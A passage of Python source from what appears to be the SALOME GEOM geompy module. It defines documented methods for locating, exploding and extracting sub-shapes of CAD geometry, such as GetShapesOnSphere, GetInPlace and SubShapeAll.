# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theCenter Point, specifying center of the sphere to find shapes on.
# @param theRadius Radius of the sphere to find shapes on.
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of all found sub-shapes.
#
# @ref swig_GetShapesOnSphere "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnSphere(self, theShape, theShapeType, theCenter, theRadius, theState, theName=None):
"""
Find in theShape all sub-shapes of type theShapeType, situated relatively
the specified sphere by the certain way, defined through theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theCenter Point, specifying center of the sphere to find shapes on.
theRadius Radius of the sphere to find shapes on.
theState The state of the sub-shapes to find (see GEOM::shape_state)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of all found sub-shapes.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnSphere(theShape, theShapeType, theCenter, theRadius, theState)
RaiseIfFailed("GetShapesOnSphere", self.ShapesOp)
self._autoPublish(aList, theName, "shapeOnSphere")
return aList
## Find in \a theShape all sub-shapes of type \a theShapeType, situated relatively
# the specified sphere by the certain way, defined through \a theState parameter.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theCenter Point, specifying center of the sphere to find shapes on.
# @param theRadius Radius of the sphere to find shapes on.
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
#
# @return List of all found sub-shapes indices.
#
# @ref swig_GetShapesOnSphereIDs "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnSphereIDs(self, theShape, theShapeType, theCenter, theRadius, theState):
"""
Find in theShape all sub-shapes of type theShapeType, situated relatively
the specified sphere by the certain way, defined through theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theCenter Point, specifying center of the sphere to find shapes on.
theRadius Radius of the sphere to find shapes on.
theState The state of the sub-shapes to find (see GEOM::shape_state)
Returns:
List of all found sub-shapes indices.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnSphereIDs(theShape, theShapeType, theCenter, theRadius, theState)
RaiseIfFailed("GetShapesOnSphereIDs", self.ShapesOp)
return aList
## Find in \a theShape all sub-shapes of type \a theShapeType, situated relatively
# the specified quadrangle by the certain way, defined through \a theState parameter.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theTopLeftPoint Point, specifying top left corner of a quadrangle
# @param theTopRigthPoint Point, specifying top right corner of a quadrangle
# @param theBottomLeftPoint Point, specifying bottom left corner of a quadrangle
# @param theBottomRigthPoint Point, specifying bottom right corner of a quadrangle
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of all found sub-shapes.
#
# @ref swig_GetShapesOnQuadrangle "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnQuadrangle(self, theShape, theShapeType,
theTopLeftPoint, theTopRigthPoint,
theBottomLeftPoint, theBottomRigthPoint, theState, theName=None):
"""
Find in theShape all sub-shapes of type theShapeType, situated relatively
the specified quadrangle by the certain way, defined through theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theTopLeftPoint Point, specifying top left corner of a quadrangle
theTopRigthPoint Point, specifying top right corner of a quadrangle
theBottomLeftPoint Point, specifying bottom left corner of a quadrangle
theBottomRigthPoint Point, specifying bottom right corner of a quadrangle
theState The state of the sub-shapes to find (see GEOM::shape_state)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of all found sub-shapes.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnQuadrangle(theShape, theShapeType,
theTopLeftPoint, theTopRigthPoint,
theBottomLeftPoint, theBottomRigthPoint, theState)
RaiseIfFailed("GetShapesOnQuadrangle", self.ShapesOp)
self._autoPublish(aList, theName, "shapeOnQuadrangle")
return aList
## Find in \a theShape all sub-shapes of type \a theShapeType, situated relatively
# the specified quadrangle by the certain way, defined through \a theState parameter.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theTopLeftPoint Point, specifying top left corner of a quadrangle
# @param theTopRigthPoint Point, specifying top right corner of a quadrangle
# @param theBottomLeftPoint Point, specifying bottom left corner of a quadrangle
# @param theBottomRigthPoint Point, specifying bottom right corner of a quadrangle
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
#
# @return List of all found sub-shapes indices.
#
# @ref swig_GetShapesOnQuadrangleIDs "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnQuadrangleIDs(self, theShape, theShapeType,
theTopLeftPoint, theTopRigthPoint,
theBottomLeftPoint, theBottomRigthPoint, theState):
"""
Find in theShape all sub-shapes of type theShapeType, situated relatively
the specified quadrangle by the certain way, defined through theState parameter.
Parameters:
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theTopLeftPoint Point, specifying top left corner of a quadrangle
theTopRigthPoint Point, specifying top right corner of a quadrangle
theBottomLeftPoint Point, specifying bottom left corner of a quadrangle
theBottomRigthPoint Point, specifying bottom right corner of a quadrangle
theState The state of the sub-shapes to find (see GEOM::shape_state)
Returns:
List of all found sub-shapes indices.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnQuadrangleIDs(theShape, theShapeType,
theTopLeftPoint, theTopRigthPoint,
theBottomLeftPoint, theBottomRigthPoint, theState)
RaiseIfFailed("GetShapesOnQuadrangleIDs", self.ShapesOp)
return aList
## Find in \a theShape all sub-shapes of type \a theShapeType, situated relatively
# the specified \a theBox by the certain way, defined through \a theState parameter.
# @param theBox Shape for relative comparing.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of all found sub-shapes.
#
# @ref swig_GetShapesOnBox "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnBox(self, theBox, theShape, theShapeType, theState, theName=None):
"""
Find in theShape all sub-shapes of type theShapeType, situated relatively
the specified theBox by the certain way, defined through theState parameter.
Parameters:
theBox Shape for relative comparing.
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theState The state of the sub-shapes to find (see GEOM::shape_state)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of all found sub-shapes.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnBox(theBox, theShape, theShapeType, theState)
RaiseIfFailed("GetShapesOnBox", self.ShapesOp)
self._autoPublish(aList, theName, "shapeOnBox")
return aList
## Find in \a theShape all sub-shapes of type \a theShapeType, situated relatively
# the specified \a theBox by the certain way, defined through \a theState parameter.
# @param theBox Shape for relative comparing.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
#
# @return List of all found sub-shapes indices.
#
# @ref swig_GetShapesOnBoxIDs "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnBoxIDs(self, theBox, theShape, theShapeType, theState):
"""
Find in theShape all sub-shapes of type theShapeType, situated relatively
the specified theBox by the certain way, defined through theState parameter.
Parameters:
theBox Shape for relative comparing.
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theState The state of the sub-shapes to find (see GEOM::shape_state)
Returns:
List of all found sub-shapes indices.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnBoxIDs(theBox, theShape, theShapeType, theState)
RaiseIfFailed("GetShapesOnBoxIDs", self.ShapesOp)
return aList
## Find in \a theShape all sub-shapes of type \a theShapeType,
# situated relatively the specified \a theCheckShape by the
# certain way, defined through \a theState parameter.
# @param theCheckShape Shape for relative comparing. It must be a solid.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of all found sub-shapes.
#
# @ref swig_GetShapesOnShape "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnShape(self, theCheckShape, theShape, theShapeType, theState, theName=None):
"""
Find in theShape all sub-shapes of type theShapeType,
situated relatively the specified theCheckShape by the
certain way, defined through theState parameter.
Parameters:
theCheckShape Shape for relative comparing. It must be a solid.
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theState The state of the sub-shapes to find (see GEOM::shape_state)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of all found sub-shapes.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnShape(theCheckShape, theShape,
theShapeType, theState)
RaiseIfFailed("GetShapesOnShape", self.ShapesOp)
self._autoPublish(aList, theName, "shapeOnShape")
return aList
## Find in \a theShape all sub-shapes of type \a theShapeType,
# situated relatively the specified \a theCheckShape by the
# certain way, defined through \a theState parameter.
# @param theCheckShape Shape for relative comparing. It must be a solid.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return All found sub-shapes as compound.
#
# @ref swig_GetShapesOnShapeAsCompound "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnShapeAsCompound(self, theCheckShape, theShape, theShapeType, theState, theName=None):
"""
Find in theShape all sub-shapes of type theShapeType,
situated relatively the specified theCheckShape by the
certain way, defined through theState parameter.
Parameters:
theCheckShape Shape for relative comparing. It must be a solid.
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theState The state of the sub-shapes to find (see GEOM::shape_state)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
All found sub-shapes as compound.
"""
# Example: see GEOM_TestOthers.py
anObj = self.ShapesOp.GetShapesOnShapeAsCompound(theCheckShape, theShape,
theShapeType, theState)
RaiseIfFailed("GetShapesOnShapeAsCompound", self.ShapesOp)
self._autoPublish(anObj, theName, "shapeOnShape")
return anObj
## Find in \a theShape all sub-shapes of type \a theShapeType,
# situated relatively the specified \a theCheckShape by the
# certain way, defined through \a theState parameter.
# @param theCheckShape Shape for relative comparing. It must be a solid.
# @param theShape Shape to find sub-shapes of.
# @param theShapeType Type of sub-shapes to be retrieved (see ShapeType())
# @param theState The state of the sub-shapes to find (see GEOM::shape_state)
#
# @return List of all found sub-shapes indices.
#
# @ref swig_GetShapesOnShapeIDs "Example"
@ManageTransactions("ShapesOp")
def GetShapesOnShapeIDs(self, theCheckShape, theShape, theShapeType, theState):
"""
Find in theShape all sub-shapes of type theShapeType,
situated relatively the specified theCheckShape by the
certain way, defined through theState parameter.
Parameters:
theCheckShape Shape for relative comparing. It must be a solid.
theShape Shape to find sub-shapes of.
theShapeType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theState The state of the sub-shapes to find (see GEOM::shape_state)
Returns:
List of all found sub-shapes indices.
"""
# Example: see GEOM_TestOthers.py
aList = self.ShapesOp.GetShapesOnShapeIDs(theCheckShape, theShape,
theShapeType, theState)
RaiseIfFailed("GetShapesOnShapeIDs", self.ShapesOp)
return aList
## Get sub-shape(s) of theShapeWhere, which are
# coincident with \a theShapeWhat or could be a part of it.
# @param theShapeWhere Shape to find sub-shapes of.
# @param theShapeWhat Shape, specifying what to find.
# @param isNewImplementation implementation of GetInPlace functionality
# (default = False, old alghorithm based on shape properties)
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return Group of all found sub-shapes or a single found sub-shape.
#
# @note This function has a restriction on argument shapes.
# If \a theShapeWhere has curved parts with significantly
# outstanding centres (i.e. the mass centre of a part is closer to
# \a theShapeWhat than to the part), such parts will not be found.
# @image html get_in_place_lost_part.png
#
# @ref swig_GetInPlace "Example"
@ManageTransactions("ShapesOp")
def GetInPlace(self, theShapeWhere, theShapeWhat, isNewImplementation = False, theName=None):
"""
Get sub-shape(s) of theShapeWhere, which are
coincident with theShapeWhat or could be a part of it.
Parameters:
theShapeWhere Shape to find sub-shapes of.
theShapeWhat Shape, specifying what to find.
isNewImplementation Implementation of GetInPlace functionality
(default = False, old alghorithm based on shape properties)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
Group of all found sub-shapes or a single found sub-shape.
Note:
This function has a restriction on argument shapes.
If theShapeWhere has curved parts with significantly
outstanding centres (i.e. the mass centre of a part is closer to
theShapeWhat than to the part), such parts will not be found.
"""
# Example: see GEOM_TestOthers.py
anObj = None
if isNewImplementation:
anObj = self.ShapesOp.GetInPlace(theShapeWhere, theShapeWhat)
else:
anObj = self.ShapesOp.GetInPlaceOld(theShapeWhere, theShapeWhat)
pass
RaiseIfFailed("GetInPlace", self.ShapesOp)
self._autoPublish(anObj, theName, "inplace")
return anObj
## Get sub-shape(s) of \a theShapeWhere, which are
# coincident with \a theShapeWhat or could be a part of it.
#
# Implementation of this method is based on a saved history of an operation,
# produced \a theShapeWhere. The \a theShapeWhat must be among this operation's
# arguments (an argument shape or a sub-shape of an argument shape).
# The operation could be the Partition or one of boolean operations,
# performed on simple shapes (not on compounds).
#
# @param theShapeWhere Shape to find sub-shapes of.
# @param theShapeWhat Shape, specifying what to find (must be in the
# building history of the ShapeWhere).
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return Group of all found sub-shapes or a single found sub-shape.
#
# @ref swig_GetInPlace "Example"
@ManageTransactions("ShapesOp")
def GetInPlaceByHistory(self, theShapeWhere, theShapeWhat, theName=None):
"""
Implementation of this method is based on a saved history of an operation,
produced theShapeWhere. The theShapeWhat must be among this operation's
arguments (an argument shape or a sub-shape of an argument shape).
The operation could be the Partition or one of boolean operations,
performed on simple shapes (not on compounds).
Parameters:
theShapeWhere Shape to find sub-shapes of.
theShapeWhat Shape, specifying what to find (must be in the
building history of the ShapeWhere).
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
Group of all found sub-shapes or a single found sub-shape.
"""
# Example: see GEOM_TestOthers.py
anObj = self.ShapesOp.GetInPlaceByHistory(theShapeWhere, theShapeWhat)
RaiseIfFailed("GetInPlaceByHistory", self.ShapesOp)
self._autoPublish(anObj, theName, "inplace")
return anObj
## Get sub-shape of theShapeWhere, which is
# equal to \a theShapeWhat.
# @param theShapeWhere Shape to find sub-shape of.
# @param theShapeWhat Shape, specifying what to find.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object for found sub-shape.
#
# @ref swig_GetSame "Example"
@ManageTransactions("ShapesOp")
def GetSame(self, theShapeWhere, theShapeWhat, theName=None):
"""
Get sub-shape of theShapeWhere, which is
equal to theShapeWhat.
Parameters:
theShapeWhere Shape to find sub-shape of.
theShapeWhat Shape, specifying what to find.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object for found sub-shape.
"""
anObj = self.ShapesOp.GetSame(theShapeWhere, theShapeWhat)
RaiseIfFailed("GetSame", self.ShapesOp)
self._autoPublish(anObj, theName, "sameShape")
return anObj
## Get sub-shape indices of theShapeWhere, which is
# equal to \a theShapeWhat.
# @param theShapeWhere Shape to find sub-shape of.
# @param theShapeWhat Shape, specifying what to find.
# @return List of all found sub-shapes indices.
#
# @ref swig_GetSame "Example"
@ManageTransactions("ShapesOp")
def GetSameIDs(self, theShapeWhere, theShapeWhat):
"""
Get sub-shape indices of theShapeWhere, which is
equal to theShapeWhat.
Parameters:
theShapeWhere Shape to find sub-shape of.
theShapeWhat Shape, specifying what to find.
Returns:
List of all found sub-shapes indices.
"""
anObj = self.ShapesOp.GetSameIDs(theShapeWhere, theShapeWhat)
RaiseIfFailed("GetSameIDs", self.ShapesOp)
return anObj
# end of l4_obtain
## @}
## @addtogroup l4_access
## @{
## Obtain a composite sub-shape of <VAR>aShape</VAR>, composed from sub-shapes
# of aShape, selected by their unique IDs inside <VAR>aShape</VAR>
# @param aShape Shape to get sub-shape of.
# @param ListOfID List of sub-shapes indices.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return Found sub-shape.
#
# @ref swig_all_decompose "Example"
def GetSubShape(self, aShape, ListOfID, theName=None):
"""
Obtain a composite sub-shape of aShape, composed from sub-shapes
of aShape, selected by their unique IDs inside aShape
Parameters:
aShape Shape to get sub-shape of.
ListOfID List of sub-shapes indices.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
Found sub-shape.
"""
# Example: see GEOM_TestAll.py
anObj = self.AddSubShape(aShape,ListOfID)
self._autoPublish(anObj, theName, "subshape")
return anObj
## Obtain unique ID of sub-shape <VAR>aSubShape</VAR> inside <VAR>aShape</VAR>
# of aShape, selected by their unique IDs inside <VAR>aShape</VAR>
# @param aShape Shape to get sub-shape of.
# @param aSubShape Sub-shapes of aShape.
# @return ID of found sub-shape.
#
# @ref swig_all_decompose "Example"
@ManageTransactions("LocalOp")
def GetSubShapeID(self, aShape, aSubShape):
"""
Obtain unique ID of sub-shape aSubShape inside aShape
of aShape, selected by their unique IDs inside aShape
Parameters:
aShape Shape to get sub-shape of.
aSubShape Sub-shapes of aShape.
Returns:
ID of found sub-shape.
"""
# Example: see GEOM_TestAll.py
anID = self.LocalOp.GetSubShapeIndex(aShape, aSubShape)
RaiseIfFailed("GetSubShapeIndex", self.LocalOp)
return anID
## Obtain unique IDs of sub-shapes <VAR>aSubShapes</VAR> inside <VAR>aShape</VAR>
# This function is provided for performance purpose. The complexity is O(n) with n
# the number of subobjects of aShape
# @param aShape Shape to get sub-shape of.
# @param aSubShapes Sub-shapes of aShape.
# @return list of IDs of found sub-shapes.
#
# @ref swig_all_decompose "Example"
@ManageTransactions("ShapesOp")
def GetSubShapesIDs(self, aShape, aSubShapes):
"""
Obtain a list of IDs of sub-shapes aSubShapes inside aShape
This function is provided for performance purpose. The complexity is O(n) with n
the number of subobjects of aShape
Parameters:
aShape Shape to get sub-shape of.
aSubShapes Sub-shapes of aShape.
Returns:
List of IDs of found sub-shape.
"""
# Example: see GEOM_TestAll.py
anIDs = self.ShapesOp.GetSubShapesIndices(aShape, aSubShapes)
RaiseIfFailed("GetSubShapesIndices", self.ShapesOp)
return anIDs
# end of l4_access
## @}
## @addtogroup l4_decompose
## @{
## Get all sub-shapes and groups of \a theShape,
# that were created already by any other methods.
# @param theShape Any shape.
# @param theGroupsOnly If this parameter is TRUE, only groups will be
# returned, else all found sub-shapes and groups.
# @return List of existing sub-objects of \a theShape.
#
# @ref swig_all_decompose "Example"
@ManageTransactions("ShapesOp")
def GetExistingSubObjects(self, theShape, theGroupsOnly = False):
"""
Get all sub-shapes and groups of theShape,
that were created already by any other methods.
Parameters:
theShape Any shape.
theGroupsOnly If this parameter is TRUE, only groups will be
returned, else all found sub-shapes and groups.
Returns:
List of existing sub-objects of theShape.
"""
# Example: see GEOM_TestAll.py
ListObj = self.ShapesOp.GetExistingSubObjects(theShape, theGroupsOnly)
RaiseIfFailed("GetExistingSubObjects", self.ShapesOp)
return ListObj
## Get all groups of \a theShape,
# that were created already by any other methods.
# @param theShape Any shape.
# @return List of existing groups of \a theShape.
#
# @ref swig_all_decompose "Example"
@ManageTransactions("ShapesOp")
def GetGroups(self, theShape):
"""
Get all groups of theShape,
that were created already by any other methods.
Parameters:
theShape Any shape.
Returns:
List of existing groups of theShape.
"""
# Example: see GEOM_TestAll.py
ListObj = self.ShapesOp.GetExistingSubObjects(theShape, True)
RaiseIfFailed("GetExistingSubObjects", self.ShapesOp)
return ListObj
## Explode a shape on sub-shapes of a given type.
# If the shape itself matches the type, it is also returned.
# @param aShape Shape to be exploded.
# @param aType Type of sub-shapes to be retrieved (see ShapeType())
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of sub-shapes of type theShapeType, contained in theShape.
#
# @ref swig_all_decompose "Example"
@ManageTransactions("ShapesOp")
def SubShapeAll(self, aShape, aType, theName=None):
"""
Explode a shape on sub-shapes of a given type.
If the shape itself matches the type, it is also returned.
Parameters:
aShape Shape to be exploded.
aType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of sub-shapes of type theShapeType, contained in theShape.
"""
# Example: see GEOM_TestAll.py
ListObj = self.ShapesOp.MakeAllSubShapes(aShape, EnumToLong( aType ), False)
RaiseIfFailed("SubShapeAll", self.ShapesOp)
self._autoPublish(ListObj, theName, "subshape")
return ListObj
## Explode a shape on sub-shapes of a given type.
# @param aShape Shape to be exploded.
# @param aType Type of sub-shapes to be retrieved (see ShapeType())
# @return List of IDs of sub-shapes.
#
# @ref swig_all_decompose "Example"
@ManageTransactions("ShapesOp")
def SubShapeAllIDs(self, aShape, aType):
"""
Explode a shape on sub-shapes of a given type.
Parameters:
aShape Shape to be exploded (see geompy.ShapeType)
aType Type of sub-shapes to be retrieved (see geompy.ShapeType)
Returns:
List of IDs of sub-shapes.
"""
ListObj = self.ShapesOp.GetAllSubShapesIDs(aShape, EnumToLong( aType ), False)
RaiseIfFailed("SubShapeAllIDs", self.ShapesOp)
return ListObj
## Obtain a compound of sub-shapes of <VAR>aShape</VAR>,
# selected by their indices in list of all sub-shapes of type <VAR>aType</VAR>.
# Each index is in range [1, Nb_Sub-Shapes_Of_Given_Type]
# @param aShape Shape to get sub-shape of.
# @param ListOfInd List of sub-shapes indices.
# @param aType Type of sub-shapes to be retrieved (see ShapeType())
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return A compound of sub-shapes of aShape.
#
# @ref swig_all_decompose "Example"
def SubShape(self, aShape, aType, ListOfInd, theName=None):
"""
Obtain a compound of sub-shapes of aShape,
selected by their indices in list of all sub-shapes of type aType.
Each index is in range [1, Nb_Sub-Shapes_Of_Given_Type]
Parameters:
aShape Shape to get sub-shape of.
ListOfID List of sub-shapes indices.
aType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
A compound of sub-shapes of aShape.
"""
# Example: see GEOM_TestAll.py
ListOfIDs = []
AllShapeIDsList = self.SubShapeAllIDs(aShape, EnumToLong( aType ))
for ind in ListOfInd:
ListOfIDs.append(AllShapeIDsList[ind - 1])
# note: auto-publishing is done in self.GetSubShape()
anObj = self.GetSubShape(aShape, ListOfIDs, theName)
return anObj
## Explode a shape on sub-shapes of a given type.
# Sub-shapes will be sorted taking into account their gravity centers,
# to provide stable order of sub-shapes.
# If the shape itself matches the type, it is also returned.
# @param aShape Shape to be exploded.
# @param aType Type of sub-shapes to be retrieved (see ShapeType())
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of sub-shapes of type theShapeType, contained in theShape.
#
# @ref swig_SubShapeAllSorted "Example"
@ManageTransactions("ShapesOp")
def SubShapeAllSortedCentres(self, aShape, aType, theName=None):
"""
Explode a shape on sub-shapes of a given type.
Sub-shapes will be sorted taking into account their gravity centers,
to provide stable order of sub-shapes.
If the shape itself matches the type, it is also returned.
Parameters:
aShape Shape to be exploded.
aType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of sub-shapes of type theShapeType, contained in theShape.
"""
# Example: see GEOM_TestAll.py
ListObj = self.ShapesOp.MakeAllSubShapes(aShape, EnumToLong( aType ), True)
RaiseIfFailed("SubShapeAllSortedCentres", self.ShapesOp)
self._autoPublish(ListObj, theName, "subshape")
return ListObj
## Explode a shape on sub-shapes of a given type.
# Sub-shapes will be sorted taking into account their gravity centers,
# to provide stable order of sub-shapes.
# @param aShape Shape to be exploded.
# @param aType Type of sub-shapes to be retrieved (see ShapeType())
# @return List of IDs of sub-shapes.
#
# @ref swig_all_decompose "Example"
@ManageTransactions("ShapesOp")
def SubShapeAllSortedCentresIDs(self, aShape, aType):
"""
Explode a shape on sub-shapes of a given type.
Sub-shapes will be sorted taking into account their gravity centers,
to provide stable order of sub-shapes.
Parameters:
aShape Shape to be exploded.
aType Type of sub-shapes to be retrieved (see geompy.ShapeType)
Returns:
List of IDs of sub-shapes.
"""
ListIDs = self.ShapesOp.GetAllSubShapesIDs(aShape, EnumToLong( aType ), True)
RaiseIfFailed("SubShapeAllIDs", self.ShapesOp)
return ListIDs
## Obtain a compound of sub-shapes of <VAR>aShape</VAR>,
# selected by they indices in sorted list of all sub-shapes of type <VAR>aType</VAR>.
# Each index is in range [1, Nb_Sub-Shapes_Of_Given_Type]
# @param aShape Shape to get sub-shape of.
# @param ListOfInd List of sub-shapes indices.
# @param aType Type of sub-shapes to be retrieved (see ShapeType())
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return A compound of sub-shapes of aShape.
#
# @ref swig_all_decompose "Example"
def SubShapeSortedCentres(self, aShape, aType, ListOfInd, theName=None):
"""
Obtain a compound of sub-shapes of aShape,
selected by they indices in sorted list of all sub-shapes of type aType.
Each index is in range [1, Nb_Sub-Shapes_Of_Given_Type]
Parameters:
aShape Shape to get sub-shape of.
ListOfID List of sub-shapes indices.
aType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
A compound of sub-shapes of aShape.
"""
# Example: see GEOM_TestAll.py
ListOfIDs = []
AllShapeIDsList = self.SubShapeAllSortedCentresIDs(aShape, EnumToLong( aType ))
for ind in ListOfInd:
ListOfIDs.append(AllShapeIDsList[ind - 1])
# note: auto-publishing is done in self.GetSubShape()
anObj = self.GetSubShape(aShape, ListOfIDs, theName)
return anObj
## Extract shapes (excluding the main shape) of given type.
# @param aShape The shape.
# @param aType The shape type (see ShapeType())
# @param isSorted Boolean flag to switch sorting on/off.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of sub-shapes of type aType, contained in aShape.
#
# @ref swig_FilletChamfer "Example"
@ManageTransactions("ShapesOp")
def ExtractShapes(self, aShape, aType, isSorted = False, theName=None):
"""
Extract shapes (excluding the main shape) of given type.
Parameters:
aShape The shape.
aType The shape type (see geompy.ShapeType)
isSorted Boolean flag to switch sorting on/off.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of sub-shapes of type aType, contained in aShape.
"""
# Example: see GEOM_TestAll.py
ListObj = self.ShapesOp.ExtractSubShapes(aShape, EnumToLong( aType ), isSorted)
RaiseIfFailed("ExtractSubShapes", self.ShapesOp)
self._autoPublish(ListObj, theName, "subshape")
return ListObj
## Get a set of sub-shapes defined by their unique IDs inside <VAR>aShape</VAR>
# @param aShape Main shape.
# @param anIDs List of unique IDs of sub-shapes inside <VAR>aShape</VAR>.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
# @return List of GEOM.GEOM_Object, corresponding to found sub-shapes.
#
# @ref swig_all_decompose "Example"
@ManageTransactions("ShapesOp")
def SubShapes(self, aShape, anIDs, theName=None):
"""
Get a set of sub-shapes defined by their unique IDs inside theMainShape
Parameters:
aShape Main shape.
anIDs List of unique IDs of sub-shapes inside theMainShape.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of GEOM.GEOM_Object, corresponding to found sub-shapes.
"""
# Example: see GEOM_TestAll.py
ListObj = self.ShapesOp.MakeSubShapes(aShape, anIDs)
RaiseIfFailed("SubShapes", self.ShapesOp)
self._autoPublish(ListObj, theName, "subshape")
return ListObj
# end of l4_decompose
## @}
## @addtogroup l4_decompose_d
## @{
## Deprecated method
# It works like SubShapeAllSortedCentres(), but wrongly
# defines centres of faces, shells and solids.
@ManageTransactions("ShapesOp")
def SubShapeAllSorted(self, aShape, aType, theName=None):
"""
Deprecated method
It works like geompy.SubShapeAllSortedCentres, but wrongly
defines centres of faces, shells and solids.
"""
